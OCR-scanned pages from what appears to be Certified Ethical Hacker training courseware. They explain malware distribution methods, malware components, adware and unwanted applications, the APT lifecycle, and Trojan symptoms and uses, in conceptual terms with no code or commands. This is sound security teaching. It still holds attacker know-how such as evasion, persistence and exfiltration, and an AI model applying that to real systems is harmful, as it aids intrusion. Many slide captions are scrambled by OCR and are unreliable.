Bluetooth and Wireless Networks Attackers use open Bluetooth and Wi-Fi networks to attract users to connect to them. These open networks have software and hardware devices installed at the router level to capture the network traffic and data packets as well as to find the account details of the users, including usernames and passwords.

Module 07 Page 952

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Common Techniques on the Web

Exam 312-50 Certified Ethical Hacker

Attackers Use to Distribute Malware

Black hat Search Engine Optimization (SEO) @ Ranking malware pages highly in search results

Compromised Legitimate Websites Hosting embedded malware that spreads to unsuspecting visitors

Social Engineered Click-jacking @ Tricking users into clicking on innocent-looking webpages

Drive-by Downloads Exploiting flaws in browser software to install malware just by visiting a web page

Spear-phishing Sites @ Mimicking legitimate institutions in an attempt to

steal login credentials

Malvertising |@ Embedding malware in ad-networks that display across hundreds of legitimate, high-traffic sites

cE H

=|

Spam Emails Attaching the malware to emails and tricking victims to click the attachment

RTF Injection Injecting malicious macros into an RTF file and tricking users to open the malicious document

Common Techniques Attackers Use to Distribute Malware on the Web Source: Security Threat Report (https://www.sophos.com) Some standard techniques used to distribute malware on the web are as follows: Black hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages. Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user. Spear-phishing Sites: This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.

Malvertising: This technique involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on systems of unsuspecting

users.

Compromised Legitimate Websites: Often, attackers use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware on his/her system, after which the malware performs malicious activities.

Module 07 Page 953

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

=

Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.

=

Spam Emails: The attacker attaches a malicious file to an email and sends the email to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, thereby compromising his/her machine. This technique is the most common method currently in use by attackers. In addition to email attachments, an attacker may also use the email body to embed the malware.

=

Rich Text Format (RTF) Injection: RTF injection involves exploiting features of Microsoft Office such as RTF template files that are stored locally or in a remote machine. RTF templates are used for specifying the document format. Attackers inject malicious macros into RTF files and host them on their servers. When a user opens the document, the malicious template is automatically retrieved from the remote server by evading security systems.

Module 07 Page 954

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Components of Malware

CE H

@ The components of a malware software depend on the requirements of the malware author who designsit for a specific target to perform intended tasks

Cues

are Dropper Exploit aoe ae a Payload Malicious Code

Software that protects malware from undergoing reverse engineering or analysis, thus making the task of the security mechanism harder in its detection

type of Trojan that downloads other malware from the Internet on to the PC. Usually, attackers install downloader software when they first gain access to a system A type of Trojan that covertly installs other malware files on to the system ‘A malicious code that breaches the system security via software vulnerabilities to access information or install malware {A program that injects its code into other vulnerable running processes and changes how they execute to hide or prevent its removal ‘A program that conceals its code and intended purpose via various techniques, and thus, makes it hard for security mechanisms to detect or remove it {A program that allows all files to bundle together into a single executable file via compression to bypass security software detection A piece of software that allows control over a computer system after it has been exploited A command that defines malware’s basic functionalities such as stealing data and creating backdoors

Components of Malware Malware authors and attackers create malware using components that can help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly. Some essential components of most malware programs are as follows: =

Crypter: It is a software program that can conceal the existence of malware. Attackers use this software to elude antivirus detection. It protects malware from reverse engineering or analysis, thus making it difficult to detect by security mechanisms.

=

Downloader: It is a type of Trojan that downloads other malware (or) malicious code and files from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system.

=

Dropper: It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. Attackers need to first install the malware program or code on the system to execute the dropper. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners.

=

Exploit: It is the part the malware that contains code or a sequence of commands that can take advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach the system’s security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerabilities abused, exploits are categorized into local exploits and remote exploits.

Module 07 Page 955 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

=

Injector: This program injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal.

=

Obfuscator: It is a program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it.

=

Packer: This software compresses the malware file to convert the code and data of the malware into an unreadable format. It uses compression techniques to pack the malware.

=

Payload: It is the part of the malware that performs the desired activity when activated. It may be used for deleting or modifying files, degrading the system performance, opening ports, changing settings, etc., to compromise system security.

=

Malicious Code: This is a piece of code that defines the basic functionality malware and comprises commands that result in security breaches.

of the

It can take the following forms: o

Java Applets

o

ActiveX Controls

o.

Browser Plug-ins

o

Pushed Content

Module 07 Page 956

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Potentially Unwanted Application or Applications (PUAs)

CE H

@ Also knownas graywareor junkware, are potentially harmful applications that may pose severe risks to the security and privacyof data stored in the system where they are installed @ Installed when downloading and installing freeware usinga third-party installer or when acceptinga misleading license Covertly monitor and alter the data or settingsin the system, similarly to other malware

© Torrent @

;

Marketing

© Cryptomining @

as malware or a

potentially unwanted

application (PUA)

Dialers

I ORERD

_ © Adware

7 engines detected tis fle

COCO

Types of PUAs

Potentially Unwanted Application: Torrent — © Microsoft and other antimalware products have classified wTorrent, a popular BitTorrent client,

Co

@

agreement

Potentially Unwanted Application or Applications (PUAs) Potentially unwanted applications or programs (PUAs or PUPs, respectively), also known as grayware/junkware, are potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they are installed. Most PUAs originate from sources such as legitimate software packages and even malicious applications used for illegal activities. PUAs can degrade system performance and compromise privacy and data security. Most PUAs get installed when downloading and installing freeware using a third-party installer or when accepting a misleading license agreement. PUAs can covertly monitor and alter the data or settings in the system, similarly to other malware. Types of PUAs =

Adware: These PUAs display unsolicited advertisements offering free sales and pop-ups of online services when browsing websites. They may disturb normal activities and lure victims into clicking on malicious URLs. They may also issue bogus reminders regarding

outdated software or OS. =

Torrent: When using torrent applications for downloading large files, the user may be compelled to download unwanted programs that have features of peer-to-peer file sharing.

=

Marketing: Marketing PUAs monitor the online activities performed by users and send browser details and information regarding personal interests to third-party app owners. These applications then market products and resources based on users’ personal interests.

=

Cryptomining: Cryptomining PUAs make use of the victims’ personal assets and financial data on the system and perform the digital mining of cryptocurrencies such as bitcoins.

Module 07 Page 957 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Dialers: Dialers or spyware dialers are programs that get installed and configured in a system automatically to call a set of contacts at several locations without the user’s consent. Dialers cause massive telephone bills and are sometimes very difficult to locate and delete.

Potentially Unwanted Application: pTorrent

Source: https://www.myce.com Microsoft and other antimalware products have classified Torrent, a popular BitTorrent client, as malware or a potentially unwanted application (PUA). Consequently, the installation of uTorrent is blocked on many computers. Microsoft even lists wTorrent in its malware encyclopedia as PUA:Win32/Utorrent, with the description, “This application was stopped from running on your network because it has a poor reputation. This application can also affect the quality of your computing experience.”

E;

7 engines detected this file

EXE

C:]

:

(7/65 )

ae

CAT-Quicen

aw

orweb

A

ESET-NOD32

a

K7AntiVirus

A

a «Sun ) ° o —§ @

Microsoft Ad-Aware Anniabvs ata. vast ave

A ° ° ° o ry

K7GW Trendiicro Housecall AegsLab Avec avcabit Avast Mable Securty

1

Figure 7.1: Screenshot showing PUAs detected and blocked

Module 07 Page 958

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Adware

CE H

‘©

Asoftware or a program that supports advertisements and generates unsolicited ads and pop-ups

‘@

Tracks the cookies and user browsing patterns for marketing purposes and collects user data

‘@

Consumes additional bandwidth, and exhausts CPU resources and memory

Indications of Adware

Frequent system lag Inundated advertisements Incessant system crash

Disparity in the default browser homepage Presence of new toolbar or browser add-ons Slow Internet

Adware Adware refers to software or a program that supports advertisements and generates unsolicited ads and pop-ups. It tracks cookies and user browsing patterns for marketing purposes and to display advertisements. It collects user data such as visited websites to customize advertisements for the user. Legitimate software can be embedded with adware to generate revenue, in which case the adware is considered a legitimate alternative provided to customers who do not wish to pay for the software. In some cases, legitimate software may be embedded with adware by an attacker or a third party to generate revenue. Software containing legitimate adware typically provides the option to disable ads by purchasing a registration key. Software developers utilize adware as a means to reduce development costs and increase profits. Adware enables them to offer software for free or at reduced prices, motivating them to design, maintain, and upgrade their software products. Adware typically requires an Internet connection to run. Common adware programs include toolbars on a user’s desktop or those that work in conjunction with the user’s web browser. Adware may perform advanced searches on the web or a user’s hard drive and may provide features to improve the organization of bookmarks and shortcuts. Advanced adware may also include games and utilities that are free to use but display advertisements while the programs launch. For example, users may be required to wait until an ad is completed before watching a YouTube video. While adware can be beneficial by offering an alternative to paid software, attackers can misuse adware to exploit users. When legitimate adware is uninstalled, the ads should stop. Further, legitimate adware requests a user for permission before collecting user data. However, when user data are collected without the user’s permission, the adware is malicious. Such adware is termed spyware and can affect the user’s privacy and security. Malicious adware is Module 07 Page 959 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

installed on a computer via cookies, plug-ins, file sharing, freeware, and shareware. It consumes additional bandwidth and exhausts CPU resources and memory. Attackers perform spyware attacks and collect information from the target user’s hard drive about visited websites or keystrokes in order to misuse the information and conduct fraud. Indications of Adware Frequent system lag: If the system takes longer than usual to respond, it may have adware infection. Adware also affects the processor speed and consumes memory, degrading performance. Inundated advertisements: The user is flooded with unsolicited advertisements and pop-ups in the user interface while browsing. Occasionally, the advertisements can be very challenging to close, paving way to malicious redirections. Incessant system crash: The user’s system may crash or freeze constantly, occasionally displaying the blue screen of death (BSoD). Disparity in the default browser homepage: The default browser homepage unexpectedly and redirects to malicious pages that contain malware.

changes

Presence of new toolbar or browser add-ons: The installation of a new toolbar or browser add-on without the user’s consent is an indication of adware. Slow Internet: Adware may cause the Internet connection to slow down even in normal usage by downloading huge advertisements and unwanted items in the background.

Module 07 Page 960

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

LO#02: Summarize Advanced Persistent Threat (APT) Concepts

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

APT Concepts Advanced persistent threats are a major security concern for any organization, as they represent threats to the organization’s assets, resources, financial records, and other confidential data. APT attacks can damage the reputation of an organization by revealing sensitive data. This section discusses APTs as well as their characteristics and lifecycle.

Module 07 Page 961

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

What are Advanced Persistent Threats?

CE H

|@ Advanced persistent threats (APTs) are defined as a type of network attack, where an attacker gains unauthorized access to a target network and remains undetected for a long period of time |@ The main objective behind these attacks is to obtain sensitive information rather than sabotaging the organization and its network Information Obtained during APT attacks

a= Ea

© Classified documents

© Transaction information

© User credentials

© Credit card information

@ Personalinformation about

@ Organization’s business strategy

© Network information

© Control system access information

employees or customers

bod ©

information

What are Advanced Persistent Threats? An advanced persistent threat is defined as a type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time. The word “advanced” signifies the use of techniques to exploit the underlying vulnerabilities in the system. The word “persistent” signifies the external command-and-control (C&C) system that continuously extracts the data and monitors the victim’s network. The word “threat” signifies human involvement in coordination. APT attacks are highly sophisticated attacks whereby an attacker uses well-crafted malicious code along with a combination of multiple zero-day exploits to gain access to the target network. These attacks involve wellplanned and coordinated techniques whereby attackers erase evidence of their malicious activities after their objectives have been fulfilled. APT attacks are usually performed on organizations possessing valuable information, such as financial, healthcare, defense and aerospace, manufacturing, and business organizations. The main objective of these attacks is to obtain sensitive information rather than sabotaging the organization and its network. Information obtained by an attacker through APT attacks includes: =

Classified documents

=

Transaction information

=

User credentials

=

Credit card information

=

Employee’s or customer’s personal information

=

Organization’s business strategy information

=

Network information

=

Control system access information

Module 07 Page 962

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Characteristics of Advanced Persistent Threats

|

Objectives

| Obtaining sensitive information or fulfilling political or strategic goals

Timeliness

| Timeintaini taken by the attacker from assessing the target system for vulnerabilities to gaining and

Resources

| Amount of knowledge, tools, and techniques required to perform an attack

|

maintaining the access

Risk Tolerance

|

Skills and

|

Methods

Actions

CE H

_Level up to which the attack remains undetected in the target’s network Methods and tools used by the attackers to perform a certain attack

| APT consists ofa certain numberof technical “actions” that causes them to diferfromother cyberattacks

| oriAtg tack soaks | Numerous attemp tsto gaini entry into the target’s : network

Characteristics of Advanced Persistent Threats (Cont’d)

|

Numbers Involved in the Attecke

| Numberof host systems that are involved in the attack

Knowledge Source

| _ Gathering information through online sources about specific threats

Multi phasea

CE H

| APT attacks are multiphased which include reconnaissance, gaining access, discovery, capture, and data exfiltration

Tailored to the Vulnerabilities

|

Multiple Points of Entry

| The adversary creates multiple points of entry through the serverto maintain access to the target network

Evading Signature-Based Detection Systems

| APT attacks can easily bypass the security mechanisms such as firewall, antivirus software, 1DS/IPS, and email spam filter

Specific Warning Signs

|

fi vulnerabilities “it present in, the victim’s ictim’ network apts target-specific

Specific indications of an APT attack include inexplicable user account activities, presence

| ofp cxdoors, unusualfile transfersand file uploads, unusual database activity, etc.

Characteristics of Advanced Persistent Threats APTs have various characteristics based on which attackers can design and plan their activities to successfully launch an attack.

Module 07 Page 963 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

According to security researchers Sean Bodmer, Dr. Max Carpenter, some key characteristics of APTs are as follows:

Kilger,

Jade

Jones,

and

Gregory

Objectives The main objective of any APT attack is to repeatedly obtain sensitive information by gaining access to the organization’s network for illegal earnings. Another objective of an APT may be spying for political or strategic goals. Timeliness It refers to the time taken by an attacker from assessing the target system vulnerabilities to exploiting them to gain and maintain access to the target system.

for

Resources

It is defined as the amount of knowledge, tools, and techniques required to perform an attack. APT attacks are more sophisticated attacks performed by highly skilled cybercriminals, and they require considerable resources. Risk Tolerance It is defined as the level up to which the attack remains undetected in the target network. APT attacks are well planned and executed with proper knowledge of the target network, which helps them remain undetected in the network for a long time. Skills and Methods These are the methods and tools used methods used for performing the attack gather information about the target, mechanisms, and techniques to maintain

by attackers to perform a certain attack. The include various social engineering techniques to techniques to prevent detection by security access for a long time.

Actions

APT attacks follow a certain number of technical “actions” that make them different from other types of cyber-attacks. The main objective of such attacks is to maintain their presence in the victim’s network for a long time and extract as much data as possible. Attack Origination Points They refer to the numerous attempts made to gain entry into the target network. Such points of entry can be used to gain access to the network and launch further attacks. To succeed in gaining initial access, the attacker needs to conduct exhaustive research to identify the vulnerabilities and gatekeeper functions in the target network. Numbers Involved in the Attack It is defined as the number of host systems involved in the attack. APT attacks are usually performed by a crime group or crime organization. Knowledge Source It is defined as the gathering of information through online sources threats, which can be further exploited to perform certain attacks. Module 07 Page 964

about

specific

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

=

Exam 312-50 Certified Ethical Hacker

Multi-phased One of the important characteristics of APTs is that they follow multiple phases to execute an attack. The phases followed by an APT attack are reconnaissance, access, discovery, capture, and data exfiltration.

=

Tailored to the Vulnerabilities The malicious code used to execute APT attacks is designed and written such that it targets the specific vulnerabilities present in the victim’s network.

=

Multiple Points of Entries Once an adversary enters the target network, he/she establishes a connection with the server to download malicious code for further attacks. In the initial phase of an APT attack, the adversary creates multiple points of entry through the server to maintain access to the target network. If one point of entry is discovered and patched by the security analyst, then the adversary can use a different entry point.

=

Evading Signature-Based Detection Systems APT attacks are closely related to zero-day exploits, which contain malware that has never been previously discovered or deployed. Thus, APT attacks can easily bypass security mechanisms such as firewalls, antivirus software, IDS/IPS, and email spam filters.

=

Specific Warning Signs APT attacks are usually impossible to detect. However, some indications of an attack include inexplicable user account activities, the presence of a backdoor Trojan for maintaining access to the network, unusual file transfers and file uploads, unusual database activities, etc.

Module 07 Page 965 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Advanced Persistent Threat Lifecycle

CE H

Cleanup ©

Cover tracks

@

Remain undetected

= 6

Search and Exfiltration

© Exfiltration data

1

5 APT

© Test for detection

Lifecycle Persistence ©

4

Maintain access

Preparation e Define target © Research target © Organize team e Build or attain tools

2 3

Initial Intrusion

© Deployment of malware @

Establishment of outbound

connection

Expansion © Expand access © Obtain credentials Copyright © by

Advanced Persistent Threat Lifecycle In the current threat landscape, organizations need to pay greater attention to APTs. APTs may target an organization’s IT assets, financial assets, intellectual property, and reputation. Commonly used security and defensive controls will not suffice to prevent such attacks. Attackers behind such attacks adapt their TTPs based on the vulnerabilities and security posture of the target organization. Thus, they can evade the security controls of the target organization. To launch an APT attack, attackers follow a certain set of phases to target, penetrate, and exploit an organization’s network. Attackers must follow each phase step by step to successfully

compromise and gain access to the target system.

The various phases of the APT lifecycle are as follows: 1.

Preparation

The first phase of the APT lifecycle is preparation, where an adversary defines the target, performs extensive research on the target, organizes a team, builds or attains tools, and performs tests for detection. APT attacks usually require a high level of preparation, as the adversary cannot risk detection by the target’s network security. Additional resources and data may be necessary before carrying out the attack. An attacker needs to perform highly complex operations before executing the attack plan against the target organization. 2.

Initial Intrusion The next phase involves attempting to enter the target network. Common techniques used for an initial intrusion are sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Spear-phishing emails usually appear

Module 07 Page 966

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

legitimate but they contain malicious links or attachments containing executable malware. These malicious links can redirect the target to the website where the target’s web browser and software are compromised by the attacker using various exploit techniques. Sometimes, an attacker may also use social engineering techniques to gather information from the target. After obtaining information from the target, attackers use such information to launch further attacks on the target network. In this phase, malicious code or malware is deployed into the target system to initiate an outbound connection. 3.

Expansion

The primary objectives of this phase are expanding access to the target network and obtaining credentials. If the attacker's aim is to exploit and gain access to a single system, then there is no need for expansion. However, in most cases, the objective of an attacker is to access multiple systems using a single compromised system. In this scenario, the first step performed by an attacker after an initial compromise is to expand access to the target systems. The main objective of the attacker in this phase is to obtain administrative login credentials to escalate privileges and to gain further access to the systems in the network. For this purpose, the attacker tries to obtain administrative privileges for the initial target system from cached credentials and uses these credentials to gain and maintain access to other systems in the network. When attackers are unable to obtain valid credentials, they use other techniques such as social engineering, exploiting vulnerabilities, and distributing infected USB devices. After the attacker obtains the target’s account credentials, it is difficult to track his/her movement in the network, as he/she uses a legitimate username and password. This expansion phase supports other phases of the APT lifecycle. In the search and exfiltration phase, the attacker can obtain the target data by gaining access to the systems. Attackers identify systems that can be used for installing persistence mechanisms and identify appropriate systems in the network that can be leveraged to exfiltrate data. 4.

Persistence

This phase involves maintaining access to the target system, starting from evading endpoint security devices such as IDS and firewalls, entering into the network, and establishing access to the system, until there is no further use of the data and assets. To maintain access to the target system, attackers follow certain techniques or procedures, which include use of customized malware and repackaging tools. These tools are designed such that they cannot be detected by the antivirus software or security tools of the target. To maintain persistence, attackers use customized malware that includes services, executables, and drivers installed on various systems in the target network. Another way to maintain persistence is finding locations for installing the malware that are not frequently examined. These locations include routers, servers, firewalls, printers, etc.

Module 07 Page 967 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

5.

Search and Exfiltration In this phase, an attacker achieves the ultimate goal of network exploitation, which is generally to gain access to a resource that can be used for performing further attacks or using that resource for financial gain. In general, attackers target specific data or documents before launching an attack. However, in some cases, although attackers determine that crucial data are available in the target network, they are unaware of the location of the data. A common method for search and exfiltration is to steal all the data including important documents, emails, shared drives, and other types of data present on the target network. Data can also be gathered using automated tools such as network sniffers. Attackers use encryption techniques to evade data loss prevention (DLP) technologies in the target network.

6.

Cleanup This is the last phase, where an attacker performs certain actions to prevent detection and remove evidence of compromise. Techniques used by the attacker to cover his/her tracks include evading detection, eliminating evidence of intrusion, and hiding the target of the attack and attacker details. In some cases, these techniques also include manipulating the data in the target environment to mislead security analysts. It is imperative for attackers to make the system appear as it was before they gained access to it and compromised the network. Therefore, it is essential for an attacker to cover his/her tracks and remain undetected by security analysts. Attackers can change any file attributes back to their original state. Information listed, such as file size and date, is just attribute information contained in the file.

Cleanup ©

Cover tracks

@

Remain undetected

\,

Search and Exfiltration ©

Exfiltration data

Preparation

6 5

1 APT

®

Define

© © ©

Research target Organize team Build or attain tools

target

eine teres

© Test for detection

Lifecycle

Persistence © Maintain access

4

2 3

Initial Intrusion © ©

Deployment of malware Establishment of outbound connection

Expansion

© Expand access ©

Obtain credentials

Figure 7.2: Advanced Persistent Threat Lifecycle

Module 07 Page 968

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

LO#03: Explain Trojans, Their Types, and How They Infect Systems

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Trojan Concepts In this section, we will discuss the basic concepts backdoors as well as their impact on network Trojans and highlights their purpose, symptoms, various methods adopted by attackers to install malicious activities.

of Trojans to understand various Trojans and and system resources. This section describes and common ports used. It also discusses the Trojans to infect target systems and perform

This section also describes various types of Trojans. Every day, attackers discover or create new Trojans designed to discover vulnerabilities of target systems. Trojans are categorized by the way they enter systems and the types of actions they perform on these systems.

Module 07 Page 969 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

What is a Trojan? e

CE H

Itis a programin which the malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage Trojans get activated when a user performs certain predefined actions Indications of a Trojan attack include abnormal system and network activities such as disablingof antivirus and redirection to unknown pages

Trojans create a covert communication channel between the victim computer and the attacker for transferring sensitive data

&

Attacker propagates Trojan

ye Malicious Files

Internet Victim infected with Trojan Copyright © by

What is a Trojan? According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant

wooden horse that was built to hide their soldiers. The Greeks left this horse in front of the

gates of Troy. The Trojans thought that the horse was a gift from the Greeks, which they had left before apparently withdrawing from the war and brought it into their city. At night, the

Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, who eventually destroyed the city of Troy. Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on your hard disk. Attackers use computer Trojans to trick the victim into performing a predefined action. Trojans are activated upon users’ specific predefined actions such as unintentionally installing a malicious software, clicking on a malicious link, etc., and upon activation, they can grant attackers unrestricted access to all the data stored on the compromised information system and potentially cause severe damage. For example, users could download a file that appears to be a movie, but, when executed, unleashes a dangerous program that erases the hard drive or sends credit card numbers and passwords to the attacker. A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others. They can use a victim’s computer to commit illegal DoS attacks. Trojans work at the same level of privileges as the victims. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks), Module 07 Page 970

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

once the Trojan infects that system, it will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase the level of access even beyond the user running it. If successful, the Trojan can use such increased privileges to install other malicious code on the victim’s machine. A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur a liability. Trojans enter the system by means such as email attachments, downloads, and instant

messages.

Attacker

Internet

Downloads Malicious Files

propagates Trojan

Victim infected with Trojan

Malicious Files Figure 7.3: Depiction of a Trojan attack

Indications of Trojan Attack The following computer malfunctions are indications of a Trojan attack:

=

The DVD-ROM drawer opens and closes automatically.

=

The computer screen displayed backward.

=

The default background or wallpaper settings change automatically. This can performed using pictures either on the user’s computer or in the attacker’s program.

=

Printers automatically start printing documents.

=

Web pages suddenly open without input from the user.

=

The color settings of the operating system (OS) change automatically.

=

Screensavers convert to a personal scrolling message.

=

The sound volume suddenly fluctuates.

=

Antivirus programs are automatically disabled, and the data are corrupted, altered, or deleted from the system.

=

The date and time of the computer change.

Module 07 Page 971 :

blinks, flips upside-down,

or is inverted

so that everything

is be

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

T T T =

he mouse cursor moves by itself. he left- and right-click functions of the mouse are interchanged. he mouse pointer disappears completely.

The mouse pointer automatically clicks on icons and is uncontrollable.

T

he Windows Start button disappears.

Pp op-ups with bizarre messages suddenly appear. Clipboard images and text appear to be manipulated.

T

he keyboard and mouse freeze.

=

Contacts receive emails from a user’s email address that the user did not send.

=

Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button.

=

The system turns off and restarts in unusual ways.

=

The taskbar disappears automatically.

=

The Task Manager is disabled. The attacker or Trojan may disable the Task Manager function so that the victim cannot view the task list or end the task on a given program

or process.

Send me credit card details

Here is my credit card number and expire date

Send me Facebook account information

Here is my Facebook login and profile

Victim infected with Trojan

Victim infected

with Trojan

Victim infected

Here is my bank ATM and pincode

Trojan with ith Troj

Figure 7.4: Diagram showing how the attacker extracts information from the victim system

Module 07 Page 972

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

How Hackers Use Trojans

CE H

| | Delete or replace critical operating system files

Disable firewalls and antivirus

| 2 | Generate fake trafficto create DoS attacks

Create backdoors to gain remote access

3 | Record screenshots, audio, and video of

Infect victim's PC as a proxy server for relaying

4 | Use victim's PC for spamming and blasting email messages

Use the victim's PC as a botnet to perform

rs | Download spyware, adware, and malicious

Steal personal information such as passwords, security codes, and credit card information

victim’s PC

attacks

DDoS attacks

files

How Hackers Use Trojans Attackers create malicious programs such as Trojans for the following purposes: Delete or replace OS’s critical files Generate fake traffic to perform DoS attacks

Record screenshots, audio, and video of victim’s PC Use victim’s PC for spamming and blasting email messages Download spyware, adware, and malicious files Disable firewalls and antivirus Create backdoors to gain remote access Infect the victim’s PC as a proxy server for relaying attacks Use the victim’s PC as a botnet to perform DDoS attacks Steal sensitive information such as: o

Credit

card

information,

which

is useful

for

domain

registration

as

well

as for

shopping using keyloggers o

Account data passwords

such

as

email

passwords,

dial-up

passwords,

and

web

o

Important company projects, including presentations and work-related papers

service

Encrypt the victim’s machine and prevent the victim from accessing the machine

Module 07 Page 973

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Use the target system as follows: o

To store archives of illegal materials, such as child pornography. The target continues using his/her system without realizing that attackers are using it for illegal activities

o

AsanFTP server for pirated software

=

Script kiddies may just want to have fun with the target system; an attacker could plant a Trojan in the system just to make the system act strangely (e.g., the CD\DVD tray opens and closes frequently, the mouse functions improperly, etc.)

=

The attacker might use target would be held authorities

a compromised system for other illegal purposes such that the responsible if these illegal activities are discovered by the

